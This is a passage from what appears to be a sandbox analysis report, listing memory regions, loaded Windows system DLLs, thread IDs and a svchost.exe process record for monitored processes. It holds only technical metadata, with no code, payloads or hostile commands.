	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 2521
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2522
	        start_va = 0x1b9b4700000
	          end_va = 0x1b9b481ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4700000"
	        filename = ""

Region:
	              id = 2523
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2524
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2529
	        start_va = 0x1b9b46c0000
	          end_va = 0x1b9b46cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b46c0000"
	        filename = ""

Region:
	              id = 2530
	        start_va = 0x7ff7ff4a0000
	          end_va = 0x7ff7ff59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff4a0000"
	        filename = ""

Region:
	              id = 2531
	        start_va = 0x1b9b4820000
	          end_va = 0x1b9b48ddfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2532
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2533
	        start_va = 0x3074b10000
	          end_va = 0x3074b4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003074b10000"
	        filename = ""

Region:
	              id = 2534
	        start_va = 0x1b9b48e0000
	          end_va = 0x1b9b499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b48e0000"
	        filename = ""

Region:
	              id = 2535
	        start_va = 0x1b9b46d0000
	          end_va = 0x1b9b46d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b46d0000"
	        filename = ""

Region:
	              id = 2536
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 2537
	        start_va = 0x1b9b4700000
	          end_va = 0x1b9b4700fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4700000"
	        filename = ""

Region:
	              id = 2538
	        start_va = 0x1b9b4720000
	          end_va = 0x1b9b481ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4720000"
	        filename = ""

Region:
	              id = 2539
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2540
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2541
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2542
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2543
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2544
	        start_va = 0x1b9b4710000
	          end_va = 0x1b9b4716fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4710000"
	        filename = ""

Region:
	              id = 2545
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 2549
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2550
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 2551
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2552
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 2587
	        start_va = 0x1b9b48e0000
	          end_va = 0x1b9b48e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b48e0000"
	        filename = ""

Region:
	              id = 2588
	        start_va = 0x1b9b48f0000
	          end_va = 0x1b9b48f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b48f0000"
	        filename = ""

Region:
	              id = 2589
	        start_va = 0x1b9b4990000
	          end_va = 0x1b9b499ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4990000"
	        filename = ""

Region:
	              id = 2590
	        start_va = 0x1b9b49a0000
	          end_va = 0x1b9b4b27fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b49a0000"
	        filename = ""

Region:
	              id = 2591
	        start_va = 0x1b9b4b30000
	          end_va = 0x1b9b4cb0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4b30000"
	        filename = ""

Region:
	              id = 2592
	        start_va = 0x1b9b4cc0000
	          end_va = 0x1b9b60bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4cc0000"
	        filename = ""

Region:
	              id = 2593
	        start_va = 0x1b9b4900000
	          end_va = 0x1b9b492ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4900000"
	        filename = ""

Region:
	              id = 2603
	        start_va = 0x3074b50000
	          end_va = 0x3074b8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003074b50000"
	        filename = ""

Region:
	              id = 2604
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 2605
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 2606
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 2611
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2612
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 2613
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2614
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 2615
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 2616
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 2618
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 2619
	        start_va = 0x1b9b60c0000
	          end_va = 0x1b9b617ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b60c0000"
	        filename = ""

Region:
	              id = 2993
	        start_va = 0x1b9b6180000
	          end_va = 0x1b9b64b6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2994
	        start_va = 0x1b9b4930000
	          end_va = 0x1b9b4989fff
	       monitored = 1
	     entry_point = 0x1b9b49453f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 2995
	        start_va = 0x1b9b60c0000
	          end_va = 0x1b9b60e0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 2996
	        start_va = 0x1b9b6170000
	          end_va = 0x1b9b617ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b6170000"
	        filename = ""

Region:
	              id = 3002
	        start_va = 0x1b9b64c0000
	          end_va = 0x1b9b66d9fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b64c0000"
	        filename = ""

Region:
	              id = 3004
	        start_va = 0x1b9b66e0000
	          end_va = 0x1b9b68fafff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b66e0000"
	        filename = ""

Region:
	              id = 3005
	        start_va = 0x1b9b6900000
	          end_va = 0x1b9b6a12fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b6900000"
	        filename = ""

Region:
	              id = 3006
	        start_va = 0x1b9b6a20000
	          end_va = 0x1b9b6c3cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b6a20000"
	        filename = ""

Region:
	              id = 3009
	        start_va = 0x1b9b6c40000
	          end_va = 0x1b9b6d55fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b6c40000"
	        filename = ""

Region:
	              id = 3012
	        start_va = 0x3074b90000
	          end_va = 0x3074bcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003074b90000"
	        filename = ""

Region:
	              id = 3013
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 3014
	        start_va = 0x1b9b4900000
	          end_va = 0x1b9b4900fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4900000"
	        filename = ""

Region:
	              id = 3015
	        start_va = 0x1b9b4920000
	          end_va = 0x1b9b492ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4920000"
	        filename = ""

Region:
	              id = 3016
	        start_va = 0x1b9b6d60000
	          end_va = 0x1b9b6e1bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b6d60000"
	        filename = ""

Region:
	              id = 3017
	        start_va = 0x1b9b4900000
	          end_va = 0x1b9b4903fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4900000"
	        filename = ""

Region:
	              id = 3018
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 3019
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 3020
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 3027
	        start_va = 0x1b9b4910000
	          end_va = 0x1b9b4916fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001b9b4910000"
	        filename = ""

Region:
	              id = 3028
	        start_va = 0x1b9b4930000
	          end_va = 0x1b9b4930fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4930000"
	        filename = ""

Region:
	              id = 3029
	        start_va = 0x1b9b4940000
	          end_va = 0x1b9b4940fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4940000"
	        filename = ""

Region:
	              id = 3030
	        start_va = 0x1b9b4950000
	          end_va = 0x1b9b4954fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 3031
	        start_va = 0x1b9b4960000
	          end_va = 0x1b9b4960fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 3032
	        start_va = 0x1b9b4970000
	          end_va = 0x1b9b4971fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b4970000"
	        filename = ""

Region:
	              id = 3033
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 3034
	        start_va = 0x1b9b4980000
	          end_va = 0x1b9b4980fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 3035
	        start_va = 0x1b9b60c0000
	          end_va = 0x1b9b60c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001b9b60c0000"
	        filename = ""


Thread:
	id = 129
	os_tid = 0x39c


Thread:
	id = 132
	os_tid = 0x87c


Thread:
	id = 136
	os_tid = 0xc10


Thread:
	id = 243
	os_tid = 0xc18


Process:
	id = "37"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x74eab000"
	os_pid = "0x364"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "21"
	os_parent_pid = "0x214"
	cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac04" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]

Region:
	              id = 2620
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2621
	        start_va = 0xf5d010000
	          end_va = 0xf5d08ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d010000"
	        filename = ""

Region:
	              id = 2622
	        start_va = 0xf5d110000
	          end_va = 0xf5d18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d110000"
	        filename = ""

Region:
	              id = 2623
	        start_va = 0xf5d200000
	          end_va = 0xf5d3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d200000"
	        filename = ""

Region:
	              id = 2624
	        start_va = 0xf5d500000
	          end_va = 0xf5d5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d500000"
	        filename = ""

Region:
	              id = 2625
	        start_va = 0xf5d600000
	          end_va = 0xf5d6fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d600000"
	        filename = ""

Region:
	              id = 2626
	        start_va = 0xf5d800000
	          end_va = 0xf5d8fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d800000"
	        filename = ""

Region:
	              id = 2627
	        start_va = 0xf5d900000
	          end_va = 0xf5d9fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5d900000"
	        filename = ""

Region:
	              id = 2628
	        start_va = 0xf5da00000
	          end_va = 0xf5dafffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5da00000"
	        filename = ""

Region:
	              id = 2629
	        start_va = 0xf5db80000
	          end_va = 0xf5dc7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5db80000"
	        filename = ""

Region:
	              id = 2630
	        start_va = 0xf5dd80000
	          end_va = 0xf5de7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5dd80000"
	        filename = ""

Region:
	              id = 2631
	        start_va = 0xf5de80000
	          end_va = 0xf5df7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5de80000"
	        filename = ""

Region:
	              id = 2632
	        start_va = 0xf5e180000
	          end_va = 0xf5e27ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5e180000"
	        filename = ""

Region:
	              id = 2633
	        start_va = 0xf5e380000
	          end_va = 0xf5e47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5e380000"
	        filename = ""

Region:
	              id = 2634
	        start_va = 0xf5e500000
	          end_va = 0xf5e5fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5e500000"
	        filename = ""

Region:
	              id = 2635
	        start_va = 0xf5e700000
	          end_va = 0xf5e7fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5e700000"
	        filename = ""

Region:
	              id = 2636
	        start_va = 0xf5e800000
	          end_va = 0xf5e8fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5e800000"
	        filename = ""

Region:
	              id = 2637
	        start_va = 0xf5ea80000
	          end_va = 0xf5eafffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5ea80000"
	        filename = ""

Region:
	              id = 2638
	        start_va = 0xf5ee00000
	          end_va = 0xf5eefffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5ee00000"
	        filename = ""

Region:
	              id = 2639
	        start_va = 0xf5ef00000
	          end_va = 0xf5effffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5ef00000"
	        filename = ""

Region:
	              id = 2640
	        start_va = 0xf5f200000
	          end_va = 0xf5f2fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5f200000"
	        filename = ""

Region:
	              id = 2641
	        start_va = 0xf5f380000
	          end_va = 0xf5f3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5f380000"
	        filename = ""

Region:
	              id = 2642
	        start_va = 0xf5f400000
	          end_va = 0xf5f47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5f400000"
	        filename = ""

Region:
	              id = 2643
	        start_va = 0xf5f700000
	          end_va = 0xf5f77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5f700000"
	        filename = ""

Region:
	              id = 2644
	        start_va = 0xf5f800000
	          end_va = 0xf5f8fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5f800000"
	        filename = ""

Region:
	              id = 2645
	        start_va = 0xf5fa00000
	          end_va = 0xf5fafffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5fa00000"
	        filename = ""

Region:
	              id = 2646
	        start_va = 0xf5fd00000
	          end_va = 0xf5fdfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5fd00000"
	        filename = ""

Region:
	              id = 2647
	        start_va = 0xf5ff00000
	          end_va = 0xf5fffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f5ff00000"
	        filename = ""

Region:
	              id = 2648
	        start_va = 0xf60100000
	          end_va = 0xf601fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60100000"
	        filename = ""

Region:
	              id = 2649
	        start_va = 0xf60300000
	          end_va = 0xf603fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60300000"
	        filename = ""

Region:
	              id = 2650
	        start_va = 0xf60400000
	          end_va = 0xf604fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60400000"
	        filename = ""

Region:
	              id = 2651
	        start_va = 0xf60500000
	          end_va = 0xf605fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60500000"
	        filename = ""

Region:
	              id = 2652
	        start_va = 0xf60600000
	          end_va = 0xf606fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60600000"
	        filename = ""

Region:
	              id = 2653
	        start_va = 0xf60700000
	          end_va = 0xf607fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60700000"
	        filename = ""

Region:
	              id = 2654
	        start_va = 0xf60800000
	          end_va = 0xf608fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60800000"
	        filename = ""

Region:
	              id = 2655
	        start_va = 0xf60900000
	          end_va = 0xf609fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60900000"
	        filename = ""

Region:
	              id = 2656
	        start_va = 0xf60c00000
	          end_va = 0xf60cfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60c00000"
	        filename = ""

Region:
	              id = 2657
	        start_va = 0xf60d00000
	          end_va = 0xf60dfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f60d00000"
	        filename = ""

Region:
	              id = 2658
	        start_va = 0xf61700000
	          end_va = 0xf617fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f61700000"
	        filename = ""

Region:
	              id = 2659
	        start_va = 0xf61900000
	          end_va = 0xf619fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f61900000"
	        filename = ""

Region:
	              id = 2660
	        start_va = 0xf61f00000
	          end_va = 0xf61ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f61f00000"
	        filename = ""

Region:
	              id = 2661
	        start_va = 0xf62000000
	          end_va = 0xf620fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000f62000000"
	        filename = ""

Region:
	              id = 2662
	        start_va = 0xf62280000
	          end_va = 0xf6237ffff
